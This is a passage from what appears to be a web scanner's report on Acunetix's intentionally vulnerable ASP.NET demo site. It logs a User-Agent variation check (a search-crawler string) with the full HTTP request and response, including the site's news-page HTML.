style="color:Black" title="December 14">14</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></font></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
Method	POST
Parameter	Header User-Agent
Attack	msnbot/1.1 (+http://search.msn.com/msnbot.htm)
Evidence
Show / hide Request and Response
Request Header - size: 381 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: msnbot/1.1 (+http://search.msn.com/msnbot.htm) Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 Content-Length: 3743 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 3,743 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8%2BaGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BQWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A%2BICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg%2FaWQ9M2RkAgsPFgIeA3NyY2RkZNGFyTb9L%2FR3K%2BNgG4eTH6G64d5v&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKblqunCgL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBEMuJR47%2F37fBoWsDm%2B8pRHDKDZX
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:14 GMT Content-Length: 18078
Response Body - size: 18,078 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1"> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9M2RkAgsPFgIeA3NyY2RkZNGFyTb9L/R3K+NgG4eTH6G64d5v" /> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKblqunCgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBEMuJR47/37fBoWsDm+8pRHDKDZX" /> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" bgcolor="#E6DCCF"> <tr><td colspan="7" bgcolor="#E6B873"><font size="2"><table class="Calendar" cellspacing="0" border="0" width="100%"> <tr><td width="15%"><font size="2"><b><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></b></font></td><td align="center" width="70%"><font size="2"><b>December 2022</b></font></td><td align="right" width="15%"><font size="2"><b><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></b></font></td></tr> </table></font></td></tr><tr><th align="center" abbr="Sunday" scope="col"><font size="2">Sun</font></th><th align="center" abbr="Monday" scope="col"><font size="2">Mon</font></th><th align="center" abbr="Tuesday" scope="col"><font size="2">Tue</font></th><th align="center" abbr="Wednesday" scope="col"><font size="2">Wed</font></th><th align="center" abbr="Thursday" scope="col"><font size="2">Thu</font></th><th align="center" abbr="Friday" scope="col"><font size="2">Fri</font></th><th align="center" abbr="Saturday" scope="col"><font size="2">Sat</font></th></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></font></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div 